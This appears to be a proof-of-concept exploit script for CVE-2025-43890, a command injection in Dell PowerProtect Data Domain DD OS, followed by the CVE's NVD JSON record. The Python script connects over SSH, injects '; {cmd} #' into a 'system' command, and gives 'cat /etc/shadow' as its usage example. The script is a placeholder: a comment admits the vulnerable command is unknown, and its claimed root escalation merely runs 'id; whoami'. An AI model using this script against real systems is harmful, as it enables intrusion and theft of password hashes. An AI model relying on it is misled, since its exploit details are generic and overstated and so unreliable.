CVE-2025-43890

# CVE-2025-43890 - Dell PowerProtect Data Domain OS Command Injection PoC # Vulnerability: Improper Neutralization of Special Elements used in an OS Command (CWE-78) # Affected: DD OS Feature Release 7.7.1.0 - 8.3.0.15, LTS2025 8.3.1.0, LTS2024 7.13.1.0-7.13.1.30, LTS2023 7.10.1.0-7.10.1.60 import paramiko import sys def exploit(target_host, username, password, cmd): """ Exploit OS Command Injection in Dell PowerProtect Data Domain DD OS Requires high-privilege local credentials (admin-level access) """ try: # Connect to DD OS via SSH (local access required) client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) client.connect(target_host, port=22, username=username, password=password, timeout=10) # Inject OS command via vulnerable input field # The vulnerable parameter passes user input directly to system() without sanitization malicious_payload = f'; {cmd} #' # Execute via the vulnerable DD OS admin command interface # Replace 'system' with the actual vulnerable command/parameter stdin, stdout, stderr = client.exec_command(f'system {malicious_payload}') output = stdout.read().decode('utf-8', errors='ignore') print(f"[+] Command output:\n{output}") # Attempt privilege escalation to root stdin, stdout, stderr = client.exec_command('id; whoami') print(f"[+] Current identity: {stdout.read().decode()}") client.close() return True except Exception as e: print(f"[-] Exploit failed: {e}") return False if __name__ == "__main__": if len(sys.argv) != 5: print(f"Usage: {sys.argv[0]} <target_ip> <username> <password> <command>") print(f"Example: {sys.argv[0]} 192.168.1.100 admin pass123 'cat /etc/shadow'") sys.exit(1) target, user, passwd, command = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4] exploit(target, user, passwd, command)

{"cve": {"id": "CVE-2025-43890", "sourceIdentifier": "[email protected]", "published": "2025-10-07T18:15:59.510", "lastModified": "2025-10-14T20:15:48.480", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.3.0.15, LTS2025 release version 8.3.1.0, LTS2024 release versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to arbitrary command execution. Exploitation may allow privilege escalation to root."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.70", "matchCriteriaId": "7FCE50EA-F2B8-4455-A489-1947B0CBFEEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.40", "matchCriteriaId": "C0EA46C5-6776-411A-8FBC-5B32BC216888"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.0.0", "versionEndIncluding": "8.3.0.15", "matchCriteriaId": "F1DB489A-E2CF-4477-A08B-101B569A714E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.3.1.10", "matchCriteriaId": "9E0743E3-14E7-4FF9-88C5-E038D62F2344"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000376224/dsa-2025-333-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}